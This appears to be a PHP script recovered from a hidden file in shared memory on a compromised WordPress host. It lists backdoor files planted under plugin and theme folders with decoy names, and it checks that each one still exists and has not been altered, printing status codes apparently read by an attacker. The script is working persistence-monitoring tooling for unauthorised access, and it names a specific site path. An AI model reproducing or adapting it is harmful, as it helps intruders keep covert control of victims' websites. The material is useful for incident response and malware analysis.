File: //dev/shm/.binding
<?php $r = '/home/clamorou/brightstarpremiercleaning.com'; $x = ["/wp-content/themes/custom-file-3-1753161281/archlve.php"=>"bd@@274953@@1105",
"/wp-content/plugins/pro-elements/modules/forms/submissions/data/responses/query.failed.response.php"=>"bd@@1087848@@930",
"/wp-content/plugins/pro-elements/vendor_prefixed/php-di/php-di/src/Definition/Resolver/suggest1.php"=>"bd@@1041530@@966",
"/wp-content/plugins/wp-file-manager/lib/php/elFinderFlysystemGoogleDriveNetmount.php"=>"bd@@279164@@batch_process",
"/wp-content/plugins/pro-elements/vendor_prefixed/php-di/php-di/src/Definition/Exception/db_links.inc.php"=>"bd@@1095041@@942",
"/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/System.WPCLI.php"=>"bd@@1095044@@996",
"/wp-content/plugins/pro-elements/modules/notes/database/transformers/user.transformer.php"=>"bd@@279205@@648",
"/wp-content/plugins/pro-elements/core/app/modules/site-editor/data/endpoints/templates.types.php"=>"bd@@276444@@574",
"/wp-content/plugins/disable-xml-rpc-api/lib/skelet/fields/switcher/switcher.php"=>"bd@@520418@@query_handler",
"/wp-content/themes/custom-file-3-1753161281/arabic.php"=>"bd@@520675@@650",
"/wp-content/plugins/pro-elements/vendor_prefixed/laravel/serializable-closure/src/Signers/gallery.lang_fa.php"=>"bd@@276458@@1627",
"/wp-content/plugins/pro-elements/modules/forms/submissions/database/repositories/form.snapshot.repository.php"=>"bd@@1087847@@950"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');